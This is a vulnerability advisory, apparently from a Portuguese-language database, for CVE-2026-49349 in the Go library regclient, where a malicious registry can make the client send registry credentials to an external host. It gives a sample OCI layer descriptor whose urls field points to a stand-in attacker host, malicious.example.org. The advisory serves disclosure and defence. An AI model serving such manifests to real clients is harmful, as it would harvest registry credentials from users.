PT-2026-53024 · Go · Github.Com/Regclient/Regclient

Publicado

2026-06-26

Atualizado

2026-06-26

CVE-2026-49349

CVSS v3.1

6.8

Média

Vetor

AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N

Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.

Example attack

A malicious registry serves an OCI image manifest containing a layer descriptor with a urls field pointing to an attacker controlled host:

json

{
 "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
 "digest": "sha256:...",
 "size": 1024,
 "urls": ["https://malicious.example.org/blobs/sha256/..."]
}

When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.

Timeline

2026-05-25: Advisory submitted
2026-05-26: Fix released

Credit

Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security

Correção

Insufficiently Protected Credentials

Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾

dbugs@ptsecurity.com

Enumeração de Fraquezas

CWE-522

Identificadores relacionados

CVE-2026-49349

GHSA-QVQC-4C52-X6QP

Produtos afetados

Github.Com/Regclient/Regclient

PT-2026-53024 · Go · Github.Com/Regclient/Regclient

CVE-2026-49349

Example attack

Timeline

Credit

Enumeração de Fraquezas

Identificadores relacionados

Produtos afetados

Referências · 3